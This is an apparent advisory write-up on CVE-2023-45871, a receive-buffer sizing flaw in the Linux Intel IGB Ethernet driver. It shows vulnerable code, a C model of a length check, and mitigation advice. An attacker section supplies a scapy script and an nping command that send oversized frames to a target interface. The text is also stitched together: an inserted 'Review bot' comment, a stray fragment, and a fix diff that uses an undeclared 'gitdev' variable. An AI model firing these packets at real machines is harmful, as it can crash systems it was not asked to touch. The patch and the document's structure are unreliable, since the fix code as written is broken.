CVE-2023-45871 - Critical Buffer Size Issue in Intel IGB Driver for Linux (with Exploit Details & Code)
In late 2023, security researchers uncovered a dangerous vulnerability in the IGB Ethernet driver for Linux (drivers/net/ethernet/intel/igb/igb_main.c), tracked as CVE-2023-45871. The flaw can lead to buffer overflows when the driver handles unexpectedly large network frames. It impacts Linux kernel versions prior to 6.5.3 and can lead to crashes or even arbitrary code execution under certain conditions.
This detailed post will break down the mechanics of the bug in simple language, show example code, and discuss exploitation routes, with links to official sources.
What is the IGB Driver?
The IGB driver is responsible for managing Intel(R) Gigabit Ethernet adapters under Linux, allowing the system to communicate over wired networks reliably.
Vulnerable Component
- File: drivers/net/ethernet/intel/igb/igb_main.c
Description
The bug comes down to improper buffer sizing when receiving Ethernet frames that are larger than the defined *Maximum Transmission Unit* (MTU). Under some networking circumstances—like VLAN stacking or custom large frames—packets larger than expected slip through. Because the IGB driver doesn't sufficiently check or resize its memory buffer, a *buffer overflow* may occur.
Summary
> "The IGB driver does not allocate enough memory for packets larger than the MTU, which can cause buffer overflows, memory corruption, crashes, or potentially allow attackers to execute malicious code."
Let's look at the relevant vulnerable code (simplified for explanation):

```c
// In igb_main.c prior to kernel 6.5.3
#define IGB_RX_BUFFER_LEN (ETH_FRAME_LEN + ETH_FCS_LEN)

struct sk_buff *skb = netdev_alloc_skb_ip_align(dev, IGB_RX_BUFFER_LEN);
if (!skb) {
    // handle error
}
// len comes from the received frame and is never compared with IGB_RX_BUFFER_LEN
memcpy(skb_put(skb, len), buff, len);
```
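The length check that the simplified snippet above omits, shown as an added userspace C model (not code from the kernel or from this post): the copy is refused when the frame does not fit in what is left of the buffer. The `MODEL_*` constants, `struct rx_buf`, `rx_copy_checked` and `rx_try` are hypothetical names, and the frame bytes are constructed sample data.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Userspace model with hypothetical names; not kernel code. */
#define MODEL_ETH_FRAME_LEN 1514u /* same value as the kernel's ETH_FRAME_LEN */
#define MODEL_ETH_FCS_LEN   4u    /* same value as the kernel's ETH_FCS_LEN */
#define MODEL_RX_BUFFER_LEN (MODEL_ETH_FRAME_LEN + MODEL_ETH_FCS_LEN)

struct rx_buf {
    size_t  used;                      /* bytes already written */
    uint8_t data[MODEL_RX_BUFFER_LEN]; /* fixed-size receive buffer */
};

enum rx_status { RX_OK = 0, RX_DROP_OVERSIZE = -1 };

/* Append a frame only if it fits in the space that is left. */
enum rx_status rx_copy_checked(struct rx_buf *rb, const uint8_t *frame, size_t len)
{
    /* Test `used` first so the subtraction below cannot wrap around. */
    if (rb->used > sizeof(rb->data) || len > sizeof(rb->data) - rb->used)
        return RX_DROP_OVERSIZE;       /* drop rather than write past the end */

    memcpy(rb->data + rb->used, frame, len);
    rb->used += len;
    return RX_OK;
}

/* Constructed sample: a buffer already holding `used` bytes gets a `len`-byte frame. */
enum rx_status rx_try(size_t used, size_t len)
{
    static const uint8_t wire[4096];   /* constructed frame bytes, all zero */
    struct rx_buf rb = { .used = used };

    if (len > sizeof(wire))
        return RX_DROP_OVERSIZE;       /* sample source itself is only 4096 bytes */
    return rx_copy_checked(&rb, wire, len);
}

int main(void)
{
    printf("1518-byte frame: %d\n", rx_try(0, 1518));        /* fits exactly */
    printf("2000-byte frame: %d\n", rx_try(0, 2000));        /* rejected */
    printf("519 bytes after 1000: %d\n", rx_try(1000, 519)); /* rejected */
    return 0;
}
```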
How Might an Attacker Use This?
- Local Network: Attacker crafts special Ethernet packets slightly above the normal MTU, possibly with extra headers or padding.
Generating an Oversized Frame
You can use tools like scapy (Python) or pktgen to generate frames.
```python
from scapy.all import Ether, sendp, Raw

# Adjust iface to your target interface name
iface = "eth0"
oversized_payload = b"A" * 2000  # Larger than normal MTU (e.g., 1500)
packet = Ether() / Raw(load=oversized_payload)

# Send the crafted packet
sendp(packet, iface=iface, count=1)
```
With Linux Command-Line
```sh
sudo nping --ether-type 0x0800 --data-length 2000 --interface eth0 192.168.1.2
```
> *Note: These will only work if the hardware & driver allow receipt of frames above the configured MTU.*
Rejecting over-sized frames properly.
Relevant Commit:
Upstream fix for IGB driver buffer sizing
- #define IGB_RX_BUFFER_LEN (ETH_FRAME_LEN + ETH_FCS_LEN)
+ #define IGB_RX_BUFFER_LEN (max(gitdev->mtu, ETH_FRAME_LEN) + ETH_FCS_LEN)
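Review bot: the macro on the `+` line reads `gitdev->mtu`, but nothing shown on this page declares a `gitdev` (the allocation call in the earlier snippet passes `dev`), so the definition only compiles where a local of exactly that name happens to be in scope. Take the device as a macro argument instead, for example `#define IGB_RX_BUFFER_LEN(nd) (max((nd)->mtu, ETH_FRAME_LEN) + ETH_FCS_LEN)`, and update the callers to pass it. Also note that `ETH_FRAME_LEN` already includes the 14-byte Ethernet header while an MTU does not, so once the MTU is the larger operand the result leaves no room for that header; either add the header length on the MTU side or comment on why it is not needed.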
References
- NVD: CVE-2023-45871
- Kernel Patch: igb: fix buffer size calculation for RX frames
- Linux IGB Driver Source: igb_main.c
- Limit MTU sizes if you cannot upgrade immediately.
- Filter unknown/oversized frames in the switch or host firewall.
Conclusion
CVE-2023-45871 serves as a reminder that even mature drivers can introduce kernel-level bugs with serious consequences. If your systems use Intel Gigabit adapters, update your Linux kernels promptly. Always restrict access to trusted networks and monitor for unusual traffic, especially in environments running older kernels.
Timeline
Published on: 10/15/2023 01:15:09 UTC
Last modified on: 11/10/2023 18:15:08 UTC